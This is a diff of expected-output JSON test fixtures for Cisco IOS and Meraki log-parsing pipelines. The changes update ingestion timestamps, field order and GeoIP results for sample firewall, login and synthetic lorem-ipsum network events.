"severity": 6, "sequence": 1663312, - "ingested": "2021-12-09T13:33:17.492514700Z", + "ingested": "2021-12-14T14:38:00.838129867Z", "original": "Jun 20 02:42:28 192.168.100.2 1663312: Jun 20 02:42:27.342: %SEC-6-IPACCESSLOGP: list 177 denied udp 192.168.100.195(54309) -\u003e 192.168.100.255(15600), 1 packet", "code": "IPACCESSLOGP", "provider": "firewall", @@ -410,6 +389,15 @@ "facility": "SEC", "access_list": "177" } + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:l5C5fxVKRjXx6kz2MZOPm+0MjuU=", + "transport": "udp", + "type": "ipv4", + "packets": 1 } }, { @@ -425,7 +413,7 @@ "event": { "severity": 6, "sequence": 1663313, - "ingested": "2021-12-09T13:33:17.492519Z", + "ingested": "2021-12-14T14:38:00.838130372Z", "original": "Jun 20 02:42:28 192.168.100.2 1663313: Jun 20 02:42:28.374: %SEC-6-IPACCESSLOGRL: access-list logging rate-limited or missed 18 packets", "code": "IPACCESSLOGRL", "provider": "firewall", @@ -443,6 +431,15 @@ ] }, { + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "192.168.100.195", + "192.168.100.255" + ] + }, "log": { "level": "informational", "source": { @@ -461,28 +458,10 @@ "ip": "192.168.100.195" }, "message": "list 177 denied udp 192.168.100.195(43989) -\u003e 192.168.100.255(15600), 1 packet", - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:qEu4RGH+VDqSvCYBmcpiipbHIFc=", - "transport": "udp", - "type": "ipv4", - "packets": 1 - }, - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "192.168.100.195", - "192.168.100.255" - ] - }, "event": { "severity": 6, "sequence": 1663314, - "ingested": "2021-12-09T13:33:17.492524100Z", + "ingested": "2021-12-14T14:38:00.838130841Z", "original": "Jun 20 02:42:34 192.168.100.2 1663314: Jun 20 02:42:33.340: %SEC-6-IPACCESSLOGP: list 177 denied udp 192.168.100.195(43989) -\u003e 192.168.100.255(15600), 1 packet", "code": "IPACCESSLOGP", "provider": "firewall", @@ -495,9 +474,27 @@ "facility": "SEC", "access_list": "177" } + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:qEu4RGH+VDqSvCYBmcpiipbHIFc=", + "transport": "udp", + "type": "ipv4", + "packets": 1 } }, { + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "192.168.100.12", + "81.2.69.144" + ] + }, "log": { "level": "informational", "source": { @@ -507,20 +504,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", @@ -534,28 +525,10 @@ "ip": "192.168.100.12" }, "message": "list 150 denied tcp 192.168.100.12(59832) -\u003e 81.2.69.144(80), 1 packet", - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:KHXR26FFI5fAjbqPIM0o9njIDr0=", - "transport": "tcp", - "type": "ipv4", - "packets": 1 - }, - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "192.168.100.12", - "81.2.69.144" - ] - }, "event": { "severity": 6, "sequence": 1663321, - "ingested": "2021-12-09T13:33:17.492528800Z", + "ingested": "2021-12-14T14:38:00.838131313Z", "original": "Jun 20 02:43:09 192.168.100.2 1663321: Jun 20 02:43:08.454: %SEC-6-IPACCESSLOGP: list 150 denied tcp 192.168.100.12(59832) -\u003e 81.2.69.144(80), 1 packet", "code": "IPACCESSLOGP", "provider": "firewall", @@ -568,6 +541,15 @@ "facility": "SEC", "access_list": "150" } + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:KHXR26FFI5fAjbqPIM0o9njIDr0=", + "transport": "tcp", + "type": "ipv4", + "packets": 1 } }, { @@ -583,7 +565,7 @@ "event": { "severity": 6, "sequence": 1663325, - "ingested": "2021-12-09T13:33:17.492532600Z", + "ingested": "2021-12-14T14:38:00.838131789Z", "original": "Jun 20 02:43:29 192.168.100.2 1663325: Jun 20 02:43:28.403: %SEC-6-IPACCESSLOGRL: access-list logging rate-limited or missed 23 packets", "code": "IPACCESSLOGRL", "provider": "firewall", @@ -642,7 +624,7 @@ "event": { "severity": 6, "sequence": 1663326, - "ingested": "2021-12-09T13:33:17.492537400Z", + "ingested": "2021-12-14T14:38:00.838132488Z", "original": "Jun 20 02:43:29 192.168.100.2 1663326: Jun 20 02:43:28.403: %SEC-6-IPACCESSLOGDP: list 150 denied icmp 192.168.100.12 -\u003e 192.168.100.1 (3/3), 32 packets", "code": "IPACCESSLOGDP", "provider": "firewall", @@ -658,6 +640,15 @@ } }, { + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "192.168.100.12", + "81.2.69.144" + ] + }, "log": { "level": "informational", "source": { @@ -667,20 +658,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", @@ -694,28 +679,10 @@ "ip": "192.168.100.12" }, "message": "list 150 denied tcp 192.168.100.12(59834) -\u003e 81.2.69.144(80), 1 packet", - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:Nww0Z+gJpZXiHgUEpOLnoLROtqw=", - "transport": "tcp", - "type": "ipv4", - "packets": 1 - }, - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "192.168.100.12", - "81.2.69.144" - ] - }, "event": { "severity": 6, "sequence": 1663327, - "ingested": "2021-12-09T13:33:17.492542900Z", + "ingested": "2021-12-14T14:38:00.838132987Z", "original": "Jun 20 02:43:30 192.168.100.2 1663327: Jun 20 02:43:29.451: %SEC-6-IPACCESSLOGP: list 150 denied tcp 192.168.100.12(59834) -\u003e 81.2.69.144(80), 1 packet", "code": "IPACCESSLOGP", "provider": "firewall", @@ -728,9 +695,29 @@ "facility": "SEC", "access_list": "150" } + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:Nww0Z+gJpZXiHgUEpOLnoLROtqw=", + "transport": "tcp", + "type": "ipv4", + "packets": 1 } }, { + "ecs": { + "version": "1.12.0" + }, + "related": { + "user": [ + "john.smith" + ], + "ip": [ + "10.2.55.3" + ] + }, "log": { "level": "notification", "source": { @@ -748,27 +735,10 @@ "ip": "10.2.55.3" }, "message": "Login Success [user: john.smith] [Source: 10.2.55.3] [localport: 22] at 12:06:03 MST Wed Mar 24 2021", - "tags": [ - "preserve_original_event" - ], - "network": { - "type": "ipv4" - }, - "ecs": { - "version": "1.12.0" - }, - "related": { - "user": [ - "john.smith" - ], - "ip": [ - "10.2.55.3" - ] - }, "event": { "severity": 5, "sequence": 1991219, - "ingested": "2021-12-09T13:33:17.492547Z", + "ingested": "2021-12-14T14:38:00.838133469Z", "original": "Mar 24 18:06:03 192.168.100.2 1991219: Mar 24 18:06:03.424 UTC: %SEC_LOGIN-5-LOGIN_SUCCESS: Login Success [user: john.smith] [Source: 10.2.55.3] [localport: 22] at 12:06:03 MST Wed Mar 24 2021", "code": "LOGIN_SUCCESS", "provider": "firewall", @@ -780,6 +750,12 @@ "action": "Login", "facility": "SEC_LOGIN" } + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "type": "ipv4" } }, { @@ -807,17 +783,17 @@ "address": "10.5.36.9", "ip": "10.5.36.9" }, - "message": "User john.smith has exited tty session 5(10.5.36.9)", "event": { "severity": 6, "sequence": 1991220, - "ingested": "2021-12-09T13:33:17.492551Z", + "ingested": "2021-12-14T14:38:00.838133950Z", "original": "Mar 24 18:06:00 192.168.100.2 1991220: Mar 24 18:06:00.364 UTC: %SYS-6-LOGOUT: User john.smith has exited tty session 5(10.5.36.9)", "code": "LOGOUT", "provider": "firewall", "category": "network", "type": "info" }, + "message": "User john.smith has exited tty session 5(10.5.36.9)", "cisco": { "ios": { "action": "exited", @@ -836,6 +812,15 @@ } }, { + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "10.4.5.66", + "10.3.66.3" + ] + }, "log": { "level": "informational", "source": { @@ -851,26 +836,11 @@ "ip": "10.4.5.66" }, "message": "Received (*, 10.36.2.78) Join from 10.4.5.66 for invalid RP 10.3.66.3", - "tags": [ - "preserve_original_event" - ], - "network": { - "type": "ipv4" - }, - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "10.4.5.66", - "10.3.66.3" - ] - }, "event": { "severity": 6, "sequence": 1991221, "reason": "Invalid RP", - "ingested": "2021-12-09T13:33:17.492554300Z", + "ingested": "2021-12-14T14:38:00.838134440Z", "original": "Mar 24 17:37:39 192.168.100.2 1991221: Mar 24 17:37:39 UTC: %PIM-SW1-6-INVALID_RP_JOIN: Received (*, 10.36.2.78) Join from 10.4.5.66 for invalid RP 10.3.66.3", "code": "INVALID_RP_JOIN", "provider": "firewall", @@ -890,9 +860,24 @@ "facility": "PIM-SW1", "outcome": "invalid RP" } + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "type": "ipv4" } }, { + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "10.4.5.66", + "10.3.66.3" + ] + }, "log": { "level": "informational", "source": { @@ -908,26 +893,11 @@ "ip": "10.4.5.66" }, "message": "Received (10.50.22.5, 10.36.2.78) Join from 10.4.5.66 for invalid RP 10.3.66.3", - "tags": [ - "preserve_original_event" - ], - "network": { - "type": "ipv4" - }, - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "10.4.5.66", - "10.3.66.3" - ] - }, "event": { "severity": 6, "sequence": 1991221, "reason": "Invalid RP", - "ingested": "2021-12-09T13:33:17.492559100Z", + "ingested": "2021-12-14T14:38:00.838135074Z", "original": "Mar 24 17:37:39 192.168.100.2 1991221: Mar 24 17:37:39 UTC: %PIM-SW1-6-INVALID_RP_JOIN: Received (10.50.22.5, 10.36.2.78) Join from 10.4.5.66 for invalid RP 10.3.66.3", "code": "INVALID_RP_JOIN", "provider": "firewall", @@ -950,6 +920,12 @@ "facility": "PIM-SW1", "outcome": "invalid RP" } + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "type": "ipv4" } }, { @@ -965,7 +941,7 @@ "event": { "severity": 4, "sequence": 1991217, - "ingested": "2021-12-09T13:33:17.492564400Z", + "ingested": "2021-12-14T14:38:00.838135554Z", "original": "Mar 24 12:09:35 192.168.100.2 1991217: Mar 24 12:09:35.367: %OSPF-4-NOVALIDKEY: No valid authentication send key is available on interface eth0", "code": "NOVALIDKEY", "provider": "firewall", @@ -995,7 +971,7 @@ "event": { "severity": 6, "sequence": 1991218, - "ingested": "2021-12-09T13:33:17.492569200Z", + "ingested": "2021-12-14T14:38:00.838136033Z", "original": "Mar 24 12:06:47 192.168.100.2 1991218: Mar 24 12:06:47.099: %CCH323-6-CALL_PRESERVED: cch323_h225_handle_conn_loss: H.323 call preserved due to socket closure or error, Call Id = 6527, fd = 19", "code": "CALL_PRESERVED", "provider": "firewall", diff --git a/packages/cisco/data_stream/meraki/_dev/test/pipeline/test-generated.log-expected.json b/packages/cisco/data_stream/meraki/_dev/test/pipeline/test-generated.log-expected.json index 8659ea62b8f..09b45c7b326 100644 --- a/packages/cisco/data_stream/meraki/_dev/test/pipeline/test-generated.log-expected.json +++ b/packages/cisco/data_stream/meraki/_dev/test/pipeline/test-generated.log-expected.json @@ -1,1200 +1,1200 @@ { "expected": [ { - "ecs": { - "version": "1.12.0" - }, "message": "modtempo 1454047799.olab nto_ security_event olaborissecurity_event tur url=https://example.org/odoco/ria.jpg?ritin=uredolor#tatemac src=10.15.44.253:5078 dst=10.193.124.51:5293 mac=01:00:5e:28:ae:7d name=psa sha256=umq disposition=ntium action=deny", "event": { - "ingested": "2021-12-09T13:33:18.888379800Z" + "ingested": "2021-12-14T14:38:02.304888658Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "umdo 1455282753.itessequ vol_ events dhcp lease of ip 10.102.218.31 from server mac 01:00:5e:9c:c2:9c for client mac 01:00:5e:0f:87:e3 from router 10.15.16.212 on subnet ameaqu with dns aqu", "event": { - "ingested": "2021-12-09T13:33:18.888383Z" + "ingested": "2021-12-14T14:38:02.304891257Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "uipexea 1456517708.tatio minim_ flows ceroinBC flows src=10.179.60.216 dst=10.69.53.104 protocol=udp pattern: 0 reprehe", "event": { - "ingested": "2021-12-09T13:33:18.888388400Z" + "ingested": "2021-12-14T14:38:02.304891737Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "mipsu 1457752662.consec taliquip_ flows radip flows block src=10.155.236.240 dst=10.112.46.169 mac=01:00:5e:7a:74:89 protocol=ipv6 type=roidents ", "event": { - "ingested": "2021-12-09T13:33:18.888393Z" + "ingested": "2021-12-14T14:38:02.304892205Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "obeataev 1458987616.lor uidexea_appliance events MAC 01:00:5e:e1:89:ac and MAC 01:00:5e:a3:d9:ac both claim IP: 10.14.107.140", "event": { - "ingested": "2021-12-09T13:33:18.888397400Z" + "ingested": "2021-12-14T14:38:02.304892580Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "iutal 1460222571.dexe urerep events content_filtering_block url='https://api.example.org/liqu/lorem.gif?ueipsaqu=uidolore#niamqu' category0='ari' server='10.108.180.105:5098' client_mac='01:00:5e:40:9b:83'", "event": { - "ingested": "2021-12-09T13:33:18.888402700Z" + "ingested": "2021-12-14T14:38:02.304892970Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ipit 1461457525.idexea riat_appliance events MAC 01:00:5e:25:4f:e4 and MAC 01:00:5e:3f:49:e4 both claim IP: 10.149.88.198", "event": { - "ingested": "2021-12-09T13:33:18.888407900Z" + "ingested": "2021-12-14T14:38:02.304893364Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ntsuntin 1462692479.aecatcup animi events dhcp release for mac 01:00:5e:e3:10:34", "event": { - "ingested": "2021-12-09T13:33:18.888413100Z" + "ingested": "2021-12-14T14:38:02.304893748Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "orsitame 1463927433.quiratio ite events MAC 01:00:5e:48:62:22 and MAC 01:00:5e:9f:b6:a6 both claim IP: 10.243.206.225", "event": { - "ingested": "2021-12-09T13:33:18.888418300Z" + "ingested": "2021-12-14T14:38:02.304894278Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "olupta turveli.toccae tatno_ ids-alerts taliqu ids-alerts signature=temUten priority=ccusan timestamp=1465162388.iqudirection=outbound protocol=icmp src=10.131.82.116:7307", "event": { - "ingested": "2021-12-09T13:33:18.888423400Z" + "ingested": "2021-12-14T14:38:02.304894735Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "uaera 1466397342.sitas ehenderi_ security_event atquovosecurity_event iumto url=https://www5.example.net/sun/essecill.html?saute=vel#quu src=10.210.213.18:7616 dst=10.134.0.141:2703 mac=01:00:5e:aa:42:fa name=idolores sha256=llumquid disposition=tation action=accept", "event": { - "ingested": "2021-12-09T13:33:18.888428500Z" + "ingested": "2021-12-14T14:38:02.304895120Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "omn ipsumq.atcu oremagna_ security_event remipsum security_event liq signature=ist priority=tnon timestamp=1467632296.ionul shost=01:00:5e:c8:9c:2f direction=outbound protocol=udp src=10.163.72.17 dst=10.74.237.180 message:nsequu", "event": { - "ingested": "2021-12-09T13:33:18.888434400Z" + "ingested": "2021-12-14T14:38:02.304895734Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "omm 1468867250.idestla Nemoeni_appliance events MAC 01:00:5e:c4:69:7f and MAC 01:00:5e:e2:67:d2 both claim IP: 10.72.31.26", "event": { - "ingested": "2021-12-09T13:33:18.888439600Z" + "ingested": "2021-12-14T14:38:02.304896208Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "agna tionemu.eomnisis mqui ids-alerts signature=civeli priority=errorsi timestamp=1470102205.desdirection=internal protocol=tcp src=10.70.95.74:4290", "event": { - "ingested": "2021-12-09T13:33:18.888444800Z" + "ingested": "2021-12-14T14:38:02.304896613Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "olupt 1471337159.dit sumquiad events MAC 01:00:5e:ea:e8:7a and MAC 01:00:5e:9c:d2:4a both claim IP: 10.17.21.125", "event": { - "ingested": "2021-12-09T13:33:18.888449900Z" + "ingested": "2021-12-14T14:38:02.304897059Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "amqu 1472572113.uines nsec events dhcp lease of ip 10.85.10.165 from server mac 01:00:5e:63:93:48 for client mac 01:00:5e:46:17:35 from router 10.53.150.119 on subnet uiineavo with dns tisetq", "event": { - "ingested": "2021-12-09T13:33:18.888455Z" + "ingested": "2021-12-14T14:38:02.304897462Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "giatquov eritquii.dexeac iscinge ids-alerts signature=atvol priority=umiur timestamp=1473807067.imadprotocol=igmp src=10.88.231.224 dst=10.187.77.245message: iadese", "event": { - "ingested": "2021-12-09T13:33:18.888460600Z" + "ingested": "2021-12-14T14:38:02.304897998Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "agnaali 1475042022.gnam tat events content_filtering_block url='https://internal.example.com/quae/maccusa.htm?rQuisau=idex#xerci' category0='aqu' server='10.186.58.115:7238' client_mac='01:00:5e:8f:16:6d'", "event": { - "ingested": "2021-12-09T13:33:18.888465800Z" + "ingested": "2021-12-14T14:38:02.304898400Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "apariat 1476276976.tlabore untmolli_ events dhcp lease of ip 10.219.84.37 from server mac 01:00:5e:e8:bf:69 for client mac 01:00:5e:87:e1:a0 from router 10.205.47.51 on subnet uovolup with dns samvolu", "event": { - "ingested": "2021-12-09T13:33:18.888471Z" + "ingested": "2021-12-14T14:38:02.304898808Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ento 1477511930.pic evita events MAC 01:00:5e:ce:61:db and MAC 01:00:5e:ec:f8:cc both claim IP: 10.3.134.237", "event": { - "ingested": "2021-12-09T13:33:18.888476100Z" + "ingested": "2021-12-14T14:38:02.304899200Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "tmo 1478746884.fficiade uscipit events aid=vitaedi arp_resp=fugitse arp_src=veniamq auth_neg_dur=one auth_neg_failed=etMalor channel=ipi dns_req_rtt=reseos dns_resp=pariatu dns_server=tin duration=48.123000 full_conn=oquisqu identity=sperna ip_resp=eabilloi ip_src=10.182.178.217 is_8021x=tlab is_wpa=volupt last_auth_ago=osqui radio=xerc reason=iutali rssi=fdeFi type=texp vap=tasuntex client_mac=01:00:5e:e3:b1:24 client_ip=10.194.114.58 instigator=ectio http_resp=dutper dhcp_lease_completed=lamcolab dhcp_ip=ati dhcp_server=tlabo dhcp_server_mac=uames dhcp_resp=iduntu url=https://internal.example.net/ris/uamqu.txt?liqui=quioffi#uptate category0=ncidid server=10.63.194.87 vpn_type=quisno connectivity=sin", "event": { - "ingested": "2021-12-09T13:33:18.888479800Z" + "ingested": "2021-12-14T14:38:02.304899594Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "emvel 1479981839.tmollita fde events aid=nsecte arp_resp=inculpa arp_src=abo auth_neg_dur=veniamqu auth_neg_failed=nse channel=non dns_req_rtt=paquioff dns_resp=mquisnos dns_server=maven duration=71.798000 full_conn=atcu identity=labor ip_resp=didunt ip_src=10.153.0.77 is_8021x=udan is_wpa=orema last_auth_ago=invento radio=qua reason=aturQui rssi=utlabor type=rau vap=idex client_mac=01:00:5e:9e:7b:a4 client_ip=10.105.88.20 instigator=ecte http_resp=tinvolu dhcp_lease_completed=iurer dhcp_ip=iciadese dhcp_server=quidolor dhcp_server_mac=tessec dhcp_resp=olupta url=https://mail.example.com/icabo/itatio.jpg?eleum=sintoc#volupt category0=siste server=10.163.154.210 vpn_type=ept connectivity=iumtotam", "event": { - "ingested": "2021-12-09T13:33:18.888483Z" + "ingested": "2021-12-14T14:38:02.304899981Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ionevo 1481216793.ugiatnu ciati_appliance events MAC 01:00:5e:b8:7a:96 and MAC 01:00:5e:b9:6b:a8 both claim IP: 10.73.69.176", "event": { - "ingested": "2021-12-09T13:33:18.888487100Z" + "ingested": "2021-12-14T14:38:02.304900385Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "spi 1482451747.stquido ommodico_ flows ese flows allow src=10.145.248.111 dst=10.57.6.252 mac=01:00:5e:94:6a:cf protocol=udp ", "event": { - "ingested": "2021-12-09T13:33:18.888491800Z" + "ingested": "2021-12-14T14:38:02.304900901Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "smo etcons.iusmodi uamest_ security_event uiac security_event epte signature=idolo priority=quinesc timestamp=1483686701.madmi shost=01:00:5e:1c:4c:64 direction=internal protocol=icmp src=10.31.77.157 dst=10.12.182.70 message:tev", "event": { - "ingested": "2021-12-09T13:33:18.888496400Z" + "ingested": "2021-12-14T14:38:02.304901289Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "nisiuta 1484921656.roid inibusB flows cancel", "event": { - "ingested": "2021-12-09T13:33:18.888500Z" + "ingested": "2021-12-14T14:38:02.304901677Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "str 1486156610.idolore pid_ flows cteturad flows deny src=10.93.68.231 dst=10.135.217.12 mac=01:00:5e:4a:69:5b protocol=ipv6 type=archite ", "event": { - "ingested": "2021-12-09T13:33:18.888504200Z" + "ingested": "2021-12-14T14:38:02.304902066Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "amnih 1487391564.ium esciuntN_ events dhcp release for mac 01:00:5e:8b:99:98", "event": { - "ingested": "2021-12-09T13:33:18.888508100Z" + "ingested": "2021-12-14T14:38:02.304902454Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "isnost 1488626519.queips ncidi_ flows iscinge flows src=10.247.30.212 dst=10.66.89.5 mac=01:00:5e:7f:65:da protocol=igmp pattern: 1 borios", "event": { - "ingested": "2021-12-09T13:33:18.888511700Z" + "ingested": "2021-12-14T14:38:02.304902840Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "oin 1489861473.mvenia madminim events IDS: fugitsed", "event": { - "ingested": "2021-12-09T13:33:18.888515700Z" + "ingested": "2021-12-14T14:38:02.304903226Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "dmin fugi.quia iduntu security_event idestlab signature=rnatur priority=ofdeFin timestamp=1491096427.essequam dhost=01:00:5e:c1:53:b1 direction=inbound protocol=tcp src=10.221.102.245 dst=10.173.136.186 message:naal", "event": { - "ingested": "2021-12-09T13:33:18.888519100Z" + "ingested": "2021-12-14T14:38:02.304903622Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "umqu tinv.adipisc uscipitl_ ids-alerts ritatise ids-alerts signature=uamei priority=siut timestamp=1492331381.ciad dhost=01:00:5e:1f:c6:29 direction=external protocol=udp src=10.58.64.108 dst=10.54.37.86 message: entorev", "event": { - "ingested": "2021-12-09T13:33:18.888523500Z" + "ingested": "2021-12-14T14:38:02.304904009Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "velitess 1493566336.naali uunturm_ flows veli flows block src=10.147.76.202 dst=10.163.93.20 mac=01:00:5e:1d:85:ec protocol=ipv6 sport=1085 dport=3141 ", "event": { - "ingested": "2021-12-09T13:33:18.888528800Z" + "ingested": "2021-12-14T14:38:02.304904386Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "iumdol tpersp.stla uptatema_ security_event uradi security_event tot signature=llamco priority=nea timestamp=1494801290.psum dhost=01:00:5e:35:71:1e direction=internal protocol=icmp src=10.0.200.27:5905 dst=10.183.44.198:1702 message:asiarc", "event": { - "ingested": "2021-12-09T13:33:18.888534Z" + "ingested": "2021-12-14T14:38:02.304904784Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "tiaec 1496036244.rumwrit icabo_ events dhcp lease of ip 10.148.124.84 from server mac 01:00:5e:0b:2c:22 for client mac 01:00:5e:06:12:98 from router 10.28.144.180 on subnet ritin with dns temporin", "event": { - "ingested": "2021-12-09T13:33:18.888539300Z" + "ingested": "2021-12-14T14:38:02.304905286Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ica 1497271198.lillum remips_appliance events aid=uisaute arp_resp=imide arp_src=poriss auth_neg_dur=tvolup auth_neg_failed=itesseq channel=dictasun dns_req_rtt=veniamqu dns_resp=rum dns_server=quaea duration=165.611000 full_conn=mvel identity=nof ip_resp=usmodi ip_src=10.204.230.166 is_8021x=dat is_wpa=aincidu last_auth_ago=nimadmin radio=isiu reason=licabo rssi=enimadmi type=utaliqu vap=dic client_mac=01:00:5e:bb:60:a6 client_ip=10.62.71.118 instigator=ineavol http_resp=iosa dhcp_lease_completed=boNemoe dhcp_ip=onsequ dhcp_server=equinesc dhcp_server_mac=cab dhcp_resp=atisund url=https://example.net/ites/isetq.gif?nisiut=tur#avolupt category0=ariatur server=10.98.194.212 vpn_type=nimave connectivity=isciv", "event": { - "ingested": "2021-12-09T13:33:18.888544400Z" + "ingested": "2021-12-14T14:38:02.304905676Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "dipisci 1498506153.spernatu admi events content_filtering_block url='https://www.example.org/ueipsa/tae.html?eriti=atcupi#corpori' category0='borisnis' server='10.197.13.39:5912'", "event": { - "ingested": "2021-12-09T13:33:18.888549600Z" + "ingested": "2021-12-14T14:38:02.304906058Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "itsedd 1499741107.leumiur eratvol events dhcp release for mac 01:00:5e:fd:84:bb", "event": { - "ingested": "2021-12-09T13:33:18.888554800Z" + "ingested": "2021-12-14T14:38:02.304906468Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "leumiu tla.item nimid ids-alerts signature=dat priority=periam timestamp=1500976061.dquprotocol=icmp src=10.242.77.170 dst=10.150.245.88message: orisn", "event": { - "ingested": "2021-12-09T13:33:18.888560Z" + "ingested": "2021-12-14T14:38:02.304906856Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "sitam rad.loi isc_ 